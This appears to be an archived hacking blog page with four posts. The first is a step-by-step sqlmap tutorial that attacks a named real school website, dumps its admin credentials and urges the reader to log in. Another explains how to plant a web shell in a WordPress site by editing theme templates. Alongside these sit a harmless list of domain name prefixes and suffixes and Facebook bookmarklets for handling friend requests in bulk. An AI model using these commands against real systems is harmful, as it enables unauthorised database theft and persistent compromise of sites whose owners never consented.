Popular Post

Archive for September 2014

SQL Map Step by Step Tutorial

By : Unknown
Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP
its a python tool , and it is preloaded in almost every Back Track version

first of all
we need a vulnerable target!
here it is 
http://www.alliedschools.edu.pk/main_news.php?news_id=52
ok first step is to  fatch the databases 
command will be like this one

 python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 --dbs

here:- 
       -u is stand for which is vulnerable to SQL injection
 and   --dbs is used for fatching total databases in website :D



ok after completing the process of fataching the databases it will something like that 

available databases(8)
[*]informtion_schema
[*]alliedschools_web
now we are going to expoit database alliedschools_web and fatch the tables present in it XD

ok command will change a little bit :-

python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables

here :-
        -D and then name of the database from which we want to fatch tables and 
        --tables is for fatching total table present in the database 

after processing we will get the tables present in database  "alliedschools_web"




after processing we will get something like that 
  Database: alliedschools_campus
   [18 Tables ]
   admin
   campus
   ......
   ......
now we are going to fatch the cloumns from table admin of database alliedschools_campus

  command is :-
               python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns



now we will get something like this 
   Database: alliedschools_campus
   Table : admin 
   [12 columns ]
    admin_password
    admin_username
    admin_email
    ......
    ......

 This is  the last command to get the admin username and password  
   command is 
             python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password,                                admin_username --dump
and after finishing process we will get something like that 
     Database: alliedschools_campus
     Table : admin 
      [6 entries]
     admin_password   admin_username
     $erver             admin
     ......             ......
Now You Have admin Password of website, Find admin panel and ...xD
- See more at: http://www.devilscafe.in/2012/01/sqlmap-step-by-step-tutorial.html#sthash.Izc3MNCM.dpuf

300 Domain Prefixes and Suffixes

By : Unknown

As our previous article discussed, adding a prefix or a suffix to a desired generic term extends your options to target a particular market with your name. There are some benefits as well as downsides to doing it, and not all prefixes and suffixes work in all situations.
There’s really an unlimited amount of prefixes and suffixes to choose from, but we’ve put together a list of 300 total as a starting point, along with some additional ideas that give further options. Many of these are general and can be used in most cases, but some have particular uses and have been included primarily because they are used often. Never assume that a combination of any one of these and your targeted generic term makes a good name to use – think carefully about what the name conveys, whether the complete brand would be strong and whether your market would respond well to it.

List of Prefixes (115)

1
4
24
123
247
360
1st
A
AAA
ABC
About
Access
Active
All
AllAbout
Auto
Best
Better
Big
Bit
Buy
Buzz
Cafe
Classic
Cloud
Club
Cool
Crowd
Custom
Cyber
Daily
Digital
Direct
Dr
e
Easy
Eco
Elite
EZ
Fast
Find
First
Free
Fresh
Front
Get
Giga
Go
Good
Great
Hot
Huge
Hyper
i
Insider
Instant
Inter
Interactive
Internet
Just
Live
Local
Macro
Mega
Meta
Metro
Micro
Miss
Mobile
Mr
Ms
Multi
My
Nano
Neo
Net
New
Nova
Now
Omni
On
Online
Only
Paradise
Pro
Quick
Rapid
Retro
Share
Simple
Simply
Sleek
Smart
Social
Super
Talk
Tech
Techno
Tera
The
Think
Top
Uber
Ultra
Urban
Valley
VIP
Virtual
Watch
We
Web
World
XYZ
You
Your
Other Prefix Ideas
1. Geo terms and locations
Once you introduce a city, state/province, region, country or other geo term into the mix, there are practically unlimited possibilities. Unlike many prefixes/suffixes, geos can actually help you target a specific location. Geo terms can include North, Coastal and similar terms to describe the general area you’re located..
2. Positive adjectives
Good, Great, Best and Top are already on the list, but there are hundreds more positive adjectives that can be used as prefixes. If you’re targeting a younger audience, Awesome might work well for instance, or if there’s a positive aspect of your business you’d like to highlight (similar to Fast and Quick), using it as a prefix may be the way to do it.
3. Colors
Green has especially been in use as of late to signify environmentally friendly, but colors are often used as prefixes whether or not they have a particular meaning in the use. They can have an added branding benefit in the design of the brand – using Blue as a prefix and having a predominantly blue logo and website design may help the name be remembered.

List of Suffixes (185)

Note: “-” reflects suffixes to add onto a single word or at the end of a made-up word
24
101
123
247
-able
Advisors
Alley
Area
Attic
Bank
Base
Bay
Beat
Bin
Biz
Blog
Board
Book
Box
Buddy
Buzz
Cafe
Camp
Cast
Castle
Cave
Center
Central
Chat
Circle
City
Cloud
Club
Co
Com
Company
Connection
Consultants
Corp
Corner
Country
Cove
Creek
Daily
Day
Deck
Depot
Direct
Dock
Exchange
Expert
Experts
Express
Farm
Field
Finder
Forever
ForSale
Forum
Front
Garden
Genie
Group
Guide
Guru
Heaven
Help
Hill
Hole
Home
Hour
House
Hub
Hut
Inc
Info
Insider
Insight
Interactive
-io
Island
Land
Lane
Life
Limited
Line
Link
List
Live
LLC
Ltd
-ly
Mansion
Market
Marketplace
Mart
Master
Masters
Me
Media
Minute
Nation
Net
Network
News
Nexus
Ninja
Now
Ocean
Online
OnTheGo
Pad
Pal
Palace
Park
Pit
Place
Planet
Point
Pond
Portal
Post
Pro
Pros
Pulse
Report
Resource
Review
Reviews
Road
Room
Scene
Search
Seek
Shack
Share
Shop
Site
Social
Solutions
Source
Space
Sphere
Spot
Square
Station
Stead
Stop
Store
Street
Studio
Studios
Talk
Tech
Time
Tips
Today
Tools
Town
Trends
Tube
TV
Ultra
Universe
Unlimited
Us
Valley
Vault
Venue
Village
-ville
Vine
Voice
Warehouse
Watch
Wave
Way
Web
Whiz
Wire
Wizard
World
-zilla
Zone
Zoo
Other Suffix Ideas
Tag : ,

how to upload shell in wordpress site

By : Unknown
Hey all in this tutorial i will tell you all how to upload shell in wordpress. So first of all we must have access to wordpress. As many of you must have tried symlink and got worpress and joomla databases but what about uploading shell in them. So here we go just follow me 1. Log in to your worpress site and after logging in you will see something shown in below image. 2. On the left hand side you can see editor option under appearance just follow that option. 3. After getting in editor you will see different themes. So select any theme you want and then select template as shown in below image. 4. After selecting theme and template just replace this code with our shell code and then upload file. 5. Now after uploading file it must show File edited successfully and after that go to your shell directory i.e.www.targetsite.com/wp-content/themes/yourtheme/templatename.php. Our shell is uploaded ;

Auto Acept Friend requests in Facebook

By : Unknown
Code:
   1.
      //for mass accept friends
   2.
      javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);
   3.
       
   4.
      //for mass ignore friend requests
   5.
       
   6.
               javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);
   7.
       
   8.
      open http://www.facebook.com/friends/edit/?sk=requests
   9.
      and run the script
  10.
       
  11.

- Copyright © Cyber Joker BD - Date A Live - Powered by Blogger - Designed by Johanes Djogan -